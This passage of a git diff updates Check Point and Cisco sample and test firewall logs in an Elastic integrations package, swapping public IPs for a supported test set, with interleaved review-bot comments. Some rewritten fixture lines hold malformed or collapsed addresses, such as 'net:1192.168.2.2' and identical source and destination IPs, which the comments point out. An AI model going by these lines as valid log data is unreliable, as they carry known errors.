FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"81.2.69.144\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"65488\"; service:\"80\"; src:\"192.168.1.100\"; tcp_flags:\"FIN-ACK\"; tcp_packet_out_of_state:\"First packet isn't SYN\"]", "kind": "event", "action": "Drop", "id": "{0x5e818e17,0x0,0x6401a8c0,0x108620ab}", 
@@ -1058,7 +1070,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.958783900Z", + "ingested": "2021-12-09T13:31:19.083415400Z", "original": "\u003c134\u003e1 2020-03-30T07:18:59Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e819d63,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.153\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"43103\"; service:\"514\"; service_id:\"syslog\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", 
@@ -1127,7 +1139,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.958791Z", + "ingested": "2021-12-09T13:31:19.083419800Z", "original": "\u003c134\u003e1 2020-03-30T07:19:22Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"411908\"; ifdir:\"inbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e819d7a,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.255\"; inzone:\"External\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"Local\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"50024\"; service:\"137\"; service_id:\"nbname\"; src:\"192.168.1.196\"]", "kind": "event", "action": "Accept", 
@@ -1196,7 +1208,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.958798300Z", + "ingested": "2021-12-09T13:31:19.083423700Z", "original": "\u003c134\u003e1 2020-03-30T07:20:33Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"411908\"; ifdir:\"inbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e819dc1,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.100\"; inzone:\"External\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"Local\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"60226\"; service:\"22\"; service_id:\"ssh\"; src:\"192.168.1.205\"]", "kind": "event", "action": "Accept", 
@@ -1265,7 +1277,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.958805500Z", + "ingested": "2021-12-09T13:31:19.083428Z", "original": "\u003c134\u003e1 2020-03-30T07:20:35Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e819dc3,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.153\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"43103\"; service:\"514\"; service_id:\"syslog\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", diff --git a/packages/checkpoint/manifest.yml b/packages/checkpoint/manifest.yml index fe9e81c3456..3f2c7396e67 100644 --- a/packages/checkpoint/manifest.yml +++ b/packages/checkpoint/manifest.yml @@ -1,6 +1,6 @@ name: checkpoint title: Check Point -version: 1.2.0 +version: 1.2.1 release: ga description: Collect logs from Check Point with Elastic Agent. type: integration diff --git a/packages/cisco/_dev/deploy/docker/sample_logs/cisco-ios.log b/packages/cisco/_dev/deploy/docker/sample_logs/cisco-ios.log index 2b366c25af3..b8814e463d6 100644 --- a/packages/cisco/_dev/deploy/docker/sample_logs/cisco-ios.log +++ b/packages/cisco/_dev/deploy/docker/sample_logs/cisco-ios.log 
@@ -1,13 +1,13 @@ -Feb 8 04:00:48 198.51.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 198.51.100.197 -> 224.0.0.22, 1 packet -Feb 9 04:00:48 198.51.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 198.51.100.2 -> 224.0.0.2 (20), 1 packet -Feb 10 04:00:48 198.51.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 198.51.100.1 -> 255.255.255.255, 1 packet -May 3 19:11:33 198.51.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2001:DB8::3(1027) -> 2001:DB8:1000::1(22), 9 packets -Jun 20 02:41:40 198.51.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(55250) -> 198.51.100.255(15600), 1 packet -Jun 20 02:41:45 198.51.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 198.51.100.1 -> 198.51.100.2 (3/4), 1 packet -Jun 20 02:42:28 198.51.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(54309) -> 198.51.100.255(15600), 1 packet -Jun 20 02:42:28 198.51.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets -Jun 20 02:42:34 198.51.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(43989) -> 198.51.100.255(15600), 1 packet -Jun 20 02:43:09 198.51.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59832) -> 172.217.10.46(80), 1 packet -Jun 20 02:43:29 198.51.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets -Jun 20 02:43:29 198.51.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 198.51.100.12 -> 198.51.100.1 (3/3), 32 packets -Jun 20 02:43:30 198.51.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59834) -> 172.217.10.46(80), 1 packet +Feb 8 04:00:48 192.168.100.2 
585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 192.168.100.197 -> 224.0.0.22, 1 packet +Feb 9 04:00:48 192.168.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 192.168.100.2 -> 224.0.0.2 (20), 1 packet +Feb 10 04:00:48 192.168.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 192.168.100.1 -> 255.255.255.255, 1 packet +May 3 19:11:33 192.168.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -> 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets +Jun 20 02:41:40 192.168.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(55250) -> 192.168.100.255(15600), 1 packet +Jun 20 02:41:45 192.168.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 192.168.100.1 -> 192.168.100.2 (3/4), 1 packet +Jun 20 02:42:28 192.168.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(54309) -> 192.168.100.255(15600), 1 packet +Jun 20 02:42:28 192.168.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets +Jun 20 02:42:34 192.168.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(43989) -> 192.168.100.255(15600), 1 packet +Jun 20 02:43:09 192.168.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59832) -> 81.2.69.144(80), 1 packet +Jun 20 02:43:29 192.168.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets +Jun 20 02:43:29 192.168.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 192.168.100.12 -> 192.168.100.1 (3/3), 32 packets +Jun 20 02:43:30 192.168.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59834) -> 81.2.69.144(80), 1 packet 
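Review bot: The rewritten %IPV6-6-ACCESSLOGP line uses `2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6` for both the source and the destination, whereas the replaced line had two distinct endpoints (`2001:DB8::3(1027) -> 2001:DB8:1000::1(22)`), so a pipeline that swapped the source and destination fields would still produce the expected output for this record. If the only requirement is an address the test GeoIP data resolves, keeping one endpoint (for example the destination) as a second supported address, or leaving it in the RFC 3849 documentation prefix, would preserve the direction check. The `-> 81.2.69.144(80)` replacements on the two `list 150 denied tcp` lines keep distinct endpoints and do not have this problem.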
diff --git a/packages/cisco/_dev/deploy/docker/sample_logs/test-asa.log b/packages/cisco/_dev/deploy/docker/sample_logs/test-asa.log index 0cc07d2623f..b465e2da68d 100644 --- a/packages/cisco/_dev/deploy/docker/sample_logs/test-asa.log +++ b/packages/cisco/_dev/deploy/docker/sample_logs/test-asa.log @@ -1 +1 @@ -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:100.66.98.44/8256 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256 diff --git a/packages/cisco/_dev/deploy/docker/sample_logs/test-ftd.log b/packages/cisco/_dev/deploy/docker/sample_logs/test-ftd.log index ad5d5f9ee28..c7b2a67bc4e 100644 --- a/packages/cisco/_dev/deploy/docker/sample_logs/test-ftd.log +++ b/packages/cisco/_dev/deploy/docker/sample_logs/test-ftd.log 
@@ -1 +1 @@ -2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip +2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip diff --git a/packages/cisco/changelog.yml b/packages/cisco/changelog.yml index 7f22d87b70d..b7d42588364 100644 --- a/packages/cisco/changelog.yml +++ b/packages/cisco/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.12.4" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "0.12.3" changes: - description: Update Title and Description. 
diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log index 0c3aef67223..2c96d1eec05 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log 
@@ -1,38 +1,38 @@ -May 5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500) -May 5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500) -May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3 +May 5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500) +May 5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500) +May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3 May 5 17:51:17 dev01: %FTD-7-609002: Teardown local-host net:192.168.2.2 duration 0:00:00 May 5 17:51:17 dev01: %FTD-7-609001: Built local-host net:192.168.2.2 -May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 1 -May 5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (8.8.8.8/111) to fw111:192.168.2.2/111 (8.8.5.4/111) +May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 1 +May 5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (81.2.69.144/111) to fw111:192.168.2.2/111 (81.2.69.144/111) May 5 17:51:17 dev01: %FTD-6-805002: TCP Flow is no longer offloaded for connection 941243214 from net:10.192.18.4/51261 (10.192.18.4/51261) to fw109:10.192.70.66/443 (10.192.70.66/443) May 5 17:51:17 dev01: %FTD-7-710005: UDP request discarded from 
192.168.2.2/68 to fw111:10.10.10.10/67 May 5 17:51:17 dev01: %FTD-6-303002: FTP connection from net:192.168.2.2/63656 to fw111:10.192.18.4/21, user testuser Stored file /export/home/sysm/ftproot/sdsdsds/tmp.log May 5 17:51:17 dev01: %FTD-7-710006: VRRP request discarded from 192.168.2.2 to fw111:192.18.4 -May 5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 8.8.8.8/10872. -May 5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 8.8.8.8/2 laddr 10.10.10.10/2 type 8 code 0 +May 5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 81.2.69.144/10872. +May 5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 81.2.69.144/2 laddr 10.10.10.10/2 type 8 code 0 May 5 18:22:35 dev01: %ASA-7-609001: Built local-host net:10.10.10.10 May 5 18:24:31 dev01: %ASA-7-609002: Teardown local-host identity:10.10.10.10 duration 0:00:00 -May 5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 10.192.46.90/0 -May 5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3 +May 5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 10.192.46.90/0 +May 5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3 May 5 18:29:32 dev01: %ASA-6-302014: Teardown TCP connection 2960892904 for out111:10.10.10.10/443 to fw111:192.168.2.2/55225 duration 0:00:00 bytes 0 TCP Reset-I -May 5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 
1588662 for intfacename:192.168.2.2/80 (8.8.8.8/80) to net:10.10.10.10/54839 (8.8.8.8/54839) +May 5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (81.2.69.144/80) to net:10.10.10.10/54839 (81.2.69.144/54839) May 5 18:29:32 dev01: %ASA-6-302012: Teardown dynamic UDP translation from fw111:10.10.10.10/54230 to out111:192.168.2.2/54230 duration 0:00:00 May 5 18:40:50 dev01: %ASA-4-313004: Denied ICMP type=0, from laddr 10.10.10.10 on interface fw502 to 192.168.2.2: no matching session May 5 18:40:50 dev01: %ASA-6-305011: Built dynamic TCP translation from fw111:10.10.10.10/57006 to out111:192.168.2.2/57006 May 5 18:40:50 dev01: %ASA-2-106001: Inbound TCP connection denied from 192.168.2.2/43803 to 10.10.10.10/14322 flags SYN on interface out111 -May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:192.186.2.2/53356 duration 0:02:04 bytes 64585 -May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638) -May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638) +May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:1192.168.2.2/53356 duration 0:02:04 bytes 64585 +May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638) +May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638) May 5 18:40:50 dev01: %ASA-4-106023: Deny tcp src fw111:10.10.10.10/64388 dst out111:192.168.2.2/443 by access-group "out1111_access_out" [0x47e21ef4, 0x47e21ef4] May 5 18:40:50 dev01: %ASA-4-106021: Deny TCP 
reverse path check from 192.168.2.2 to 10.10.10.10 on interface fw111 May 5 19:02:58 dev01: %ASA-2-106006: Deny inbound UDP from 192.168.2.2/65020 to 10.10.10.10/65020 on interface fw111 May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/53089 to 10.10.10.10/443 flags FIN PSH ACK on interface out111 May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/17127 to 10.10.10.10/443 flags PSH ACK on interface out111 May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/24223 to 10.10.10.10/443 flags RST on interface fw111 -May 5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051) -May 5 19:02:58 dev01: %ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051) -May 5 19:02:58 dev01: %ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (8.8.8.8/10051) +May 5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051) +May 5 19:02:58 dev01: %ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051) +May 5 19:02:58 dev01: %ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (81.2.69.144/10051) May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for fw111:10.10.10.10/39210 to net:192.168.2.2/10051 duration 0:00:00 forwarded bytes 0 Cluster flow with CLU closed on owner May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for net:10.10.10.10/10051 to unknown:192.168.2.2/39222 duration 0:00:00 forwarded bytes 0 Forwarding or redirect flow removed to create director or backup flow May 5 19:03:27 
dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list fw211111_access_out brief 
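Review bot: The new %ASA-2-302016 line now reads `net:1192.168.2.2/53356`, which is not a valid IPv4 address (first octet 1192) and so will not be extracted as an IP, meaning the fixture no longer exercises the path it was written for; the old `192.186.2.2` looks like it was meant to become `net:192.168.2.2/53356`. The rewritten %ASA-6-302022 backup-stub line keeps the similarly malformed `net:192.1682.2.2/10051`, and `8.8.8.5` survives on the new side of the three 302022 lines here and of the 302026/302024 lines in the `@@ -40` hunk, which is at odds with the stated intent of moving every public test IP to the supported set. Separately, using `81.2.69.144` for both the mapped source and the mapped destination (302013, 302015, 805001, 302015 and the 302304 line in the `@@ -52` hunk) makes the source/destination NAT fields indistinguishable, as the expected output shows when `related.ip` shrinks from four entries to three, so a swapped mapping would no longer fail the test; a second supported address on one side would keep that check.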
@@ -40,10 +40,10 @@ May 5 19:02:26 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp ptaaac/192.168.2.2(62157) -> fw111/10.10.10.10(3452) hit-cnt 1 first hit [0x38ff326b, 0x00000000] May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp net/192.168.2.2(49033) -> fw111/10.10.10.10(6007) hit-cnt 2 300-second interval [0x38ff326b, 0x00000000] May 5 19:02:26 dev01: %ASA-6-302027: Teardown stub ICMP connection for fw1111:10.10.10.10/6426 to net:192.168.2.2/0 duration 1:00:04 forwarded bytes 56 Cluster flow with CLU closed on owner -May 5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (8.8.8.8) +May 5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (81.2.69.144) May 5 19:02:26 dev01: %ASA-7-710005: UDP request discarded from 10.10.10.10/1985 to net:192.168.2.2/1985 May 5 19:02:26 dev01: %ASA-6-302025: Teardown stub UDP connection for net:192.168.2.2/123 to unknown:10.10.10.10/123 duration 0:01:00 forwarded bytes 48 Cluster flow with CLU removed from due to idle timeout -May 5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (8.8.8.8/123) +May 5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (81.2.69.144/123) May 5 19:02:26 dev01: %ASA-3-106014: Deny inbound icmp src fw111:10.10.10.10 dst fw111:10.10.10.10(type 8, code 0) May 5 19:02:25 dev01: %ASA-4-733100: [192.168.2.2] drop rate-1 exceeded. 
Current burst rate is 0 per second, max configured rate is -4; Current average rate is 7 per second, max configured rate is -4; Cumulative total count is 9063 May 5 19:02:25 dev01: %ASA-3-106010: Deny inbound sctp src fw111:10.10.10.10/5114 dst fw111:10.10.10.10/2 @@ -52,9 +52,9 @@ Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL 10.20.30.40:http: Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL someuser@10.20.30.40:http://10.20.30.40/IOFUHSIU98[0] Apr 27 17:54:52 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL 10.20.30.40:http://10.20.30.40/some/longer/url-asd-er9789870[0]_=23 Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL someuser@10.20.30.40:http://10.20.30.40/ -Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:1.2.3.4/54242 to server.deflan:2.3.4.5/9101 duration 1:00:02 bytes 245 Connection timeout +Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:81.2.69.144/54242 to server.deflan:81.2.69.144/9101 duration 1:00:02 bytes 245 Connection timeout Apr 27 02:02:02 dev01: %ASA-4-106023: Deny tcp src outside:10.10.10.2/56444 dst srv:192.168.2.2/51635(testhostname.domain) by access-group "global_access_1" -Oct 20 2019 15:15:15 dev01: %ASA-5-106100: access-list testrulename denied tcp insideintf/somedomainname.local(27218) -> OUTSIDE/195.122.12.242(53) hit-cnt 1 first hit [0x16847359, 0x00000000] +Oct 20 2019 15:15:15 dev01: %ASA-5-106100: access-list testrulename denied tcp insideintf/somedomainname.local(27218) -> OUTSIDE/192.168.157.61(53) hit-cnt 1 first hit [0x16847359, 0x00000000] Apr 27 02:03:03 dev01: %ASA-5-111004: console end configuration: OK Apr 27 02:03:03 dev01: %ASA-5-111010: User 'enable_15', running 'CLI' from IP 10.10.0.87, executed 'clear' Apr 27 02:03:03 dev01: %ASA-5-502103: User priv level changed: Uname: enable_15 From: 1 To: 15 
@@ -62,24 +62,24 @@ Apr 27 02:03:03 dev01: %ASA-6-605004: Login denied from 10.10.1.212/51923 to FCD
 Apr 27 02:03:03 dev01: %ASA-6-611102: User authentication failed: IP address: 10.10.0.87, Uname: admin
 Apr 27 02:03:03 dev01: %ASA-6-605005: Login permitted from 10.10.0.87/6651 to FCD-FS-LAN:10.10.1.254/ssh for user "admin"
 Apr 27 02:03:03 dev01: %ASA-6-611101: User authentication succeeded: IP address: 10.10.0.87, Uname: admin
-Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 91.240.17.178, IP = 91.240.17.178, Security negotiation complete for LAN-to-LAN Group (91.240.17.178) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d
